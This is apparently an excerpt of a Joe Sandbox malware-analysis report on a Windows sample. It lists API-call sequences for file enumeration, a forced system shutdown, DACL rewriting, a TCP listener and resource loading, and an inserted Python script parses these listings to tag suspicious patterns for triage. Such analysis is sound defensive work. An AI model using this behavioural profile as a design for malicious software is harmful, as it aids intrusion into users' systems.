                                                                                                                                                                                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
• GetFileAttributesW.KERNEL32(?), ref: 00431AE7
• SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
• FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
• FindClose.KERNEL32(00000000), ref: 00431B20
• FindClose.KERNEL32(00000000), ref: 00431B34
• FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
• FindClose.KERNEL32(00000000), ref: 00431BCD
• FindClose.KERNEL32(00000000), ref: 00431BDB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
• Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
• __swprintf.LIBCMT ref: 00431C2E
• _wcslen.LIBCMT ref: 00431C3A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CreateDirectoryFullNamePath__swprintf_wcslen
• String ID: :$\$\??\%s
• API String ID: 2192556992-3457252023
• Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
• Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
APIs
• GetLocalTime.KERNEL32(?), ref: 004722A2
• __swprintf.LIBCMT ref: 004722B9
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
• SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
• SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
• SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
• SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
• SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: FolderPath$LocalTime__swprintf
• String ID: %.3d
• API String ID: 3337348382-986655627
• Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
• Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
• Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
• Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 1255039815-0
• Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
• Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
• Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
• Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
APIs
• __swprintf.LIBCMT ref: 00433073
• __swprintf.LIBCMT ref: 00433085
• __wcsicoll.LIBCMT ref: 00433092
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
• LoadResource.KERNEL32(?,00000000), ref: 004330BD
• LockResource.KERNEL32(00000000), ref: 004330CA
• FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
• LoadResource.KERNEL32(?,00000000), ref: 00433105
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
                                                                                                                                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1158019794-0
                                                                                                                                                                                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
• Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
• Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
• Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D627
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
• GetLastError.KERNEL32 ref: 0045D6BF
• SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
• Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
• Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
• Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove$_strncmp
• String ID: @oH$\$^$h
• API String ID: 2175499884-3701065813
• Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
• Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
• Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
• Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
APIs
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
• WSAGetLastError.WSOCK32(00000000), ref: 0046531C
• bind.WSOCK32(00000000,?,00000010), ref: 00465356
• WSAGetLastError.WSOCK32(00000000), ref: 00465363
• closesocket.WSOCK32(00000000,00000000), ref: 00465377
• listen.WSOCK32(00000000,00000005), ref: 00465381
• WSAGetLastError.WSOCK32(00000000), ref: 004653A9
• closesocket.WSOCK32(00000000,00000000), ref: 004653BD
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
• Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
• Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
• Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
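The call listings in this section give each function's raw API sequence with its arguments as hex literals; what a triager wants from them is the decoded constants and the pattern the sequence forms. The following Python is an added example (it is not part of the Joe Sandbox report and not code from the analysed sample) that parses lines in this listing's `• name.MODULE(args), ref: ADDR` form, decodes the `socket()`, `listen()` and `SetErrorMode()` argument constants, and tags the three call patterns visible in this section: the AF_INET/SOCK_STREAM/IPPROTO_TCP socket that is bound and put into `listen` with a backlog of 5, the `GetDiskFreeSpaceW` probe wrapped in `SetErrorMode(SEM_FAILCRITICALERRORS)` so an empty or unready drive raises no dialog, and the `SizeofResource`/`LockResource` read of an embedded resource. The sample listing inside the block is constructed from lines copied out of this section; the tag names and the constant tables are the example's own.

```python
import re
from typing import List, NamedTuple, Optional

# Constructed sample: API lines copied from three functions in this report's
# listing (the resource lines are the tail of a function whose earlier calls are
# not reproduced here). Leading whitespace is irrelevant; the parser strips it.
SAMPLE_LISTING = """\
APIs
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
• WSAGetLastError.WSOCK32(00000000), ref: 0046531C
• bind.WSOCK32(00000000,?,00000010), ref: 00465356
• WSAGetLastError.WSOCK32(00000000), ref: 00465363
• closesocket.WSOCK32(00000000,00000000), ref: 00465377
• listen.WSOCK32(00000000,00000005), ref: 00465381
• WSAGetLastError.WSOCK32(00000000), ref: 004653A9
• closesocket.WSOCK32(00000000,00000000), ref: 004653BD
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D627
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
• GetLastError.KERNEL32 ref: 0045D6BF
• SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
APIs
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
"""


class Call(NamedTuple):
    name: str                   # API name, e.g. "socket"
    module: str                 # module the sandbox resolved it to, e.g. "WSOCK32"
    args: List[Optional[int]]   # hex arguments as ints; an unresolved "?" becomes None
    ref: int                    # address of the call site inside the dumped image


# One "• name.MODULE(args), ref: ADDR" line. The argument list is optional:
# "GetLastError.KERNEL32 ref: 0045D6BF" carries none.
_LINE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_listing(text: str) -> List[List[Call]]:
    """Split a listing on its 'APIs' headings and parse every call line under each."""
    groups: List[List[Call]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            groups.append([])
            continue
        m = _LINE.match(line)
        if not m or not groups:
            continue            # strings, hashes, dump metadata: not call lines
        args = [_arg(t) for t in m["args"].split(",")] if m["args"] else []
        groups[-1].append(Call(m["name"], m["mod"], args, int(m["ref"], 16)))
    return groups


# Winsock constants for socket(af, type, protocol); the example's own table.
_AF = {2: "AF_INET", 23: "AF_INET6"}
_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
_PROTO = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SEM_FAILCRITICALERRORS = 0x0001   # SetErrorMode flag: no "drive not ready" dialog


def describe_socket(call: Call) -> str:
    """Decode socket(af, type, protocol) arguments into their Winsock names."""
    af, typ, proto = (call.args + [None] * 3)[:3]
    return "/".join((
        _AF.get(af, f"af={af}"),
        _TYPE.get(typ, f"type={typ}"),
        _PROTO.get(proto, f"proto={proto}"),
    ))


def classify(calls: List[Call]) -> List[str]:
    """Tag one function by the call patterns a triager looks for in this listing."""
    names = [c.name for c in calls]
    tags: List[str] = []

    # socket -> bind -> listen in that order: the function sets up a server socket.
    if "socket" in names and "bind" in names and "listen" in names:
        s, b, l = names.index("socket"), names.index("bind"), names.index("listen")
        if s < b < l:
            backlog = calls[l].args[1] if len(calls[l].args) > 1 else None
            kind = "tcp" if describe_socket(calls[s]).endswith("IPPROTO_TCP") else "socket"
            tags.append(f"{kind}-listener(backlog={backlog})")

    # SetErrorMode(SEM_FAILCRITICALERRORS) before GetDiskFreeSpaceW: the drive is
    # probed without the OS showing a dialog for an empty or unready drive.
    modes = [c.args[0] for c in calls if c.name == "SetErrorMode" and c.args]
    if ("GetDiskFreeSpaceW" in names and modes and modes[0] is not None
            and modes[0] & SEM_FAILCRITICALERRORS):
        tags.append("silent-drive-probe")

    # SizeofResource + LockResource: the function reads an embedded resource, a
    # usual place for a loader to keep its next stage. Clean programs do this
    # too, so treat the tag as a lead to follow in the dump, not as a verdict.
    if {"SizeofResource", "LockResource"} <= set(names):
        tags.append("embedded-resource-read")
    return tags


if __name__ == "__main__":
    for i, group in enumerate(parse_listing(SAMPLE_LISTING), 1):
        print(f"function {i}: {[c.name for c in group]} -> {classify(group)}")
```

Run it against the text of a function listing saved from the report instead of `SAMPLE_LISTING` and the same three tags come out per function; the `ref` addresses it keeps are the call sites to jump to in the dumped image (base 0x400000 here) when confirming a tag by hand.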
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                                                                                • API String ID: 0-2872873767
                                                                                                                                                                                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
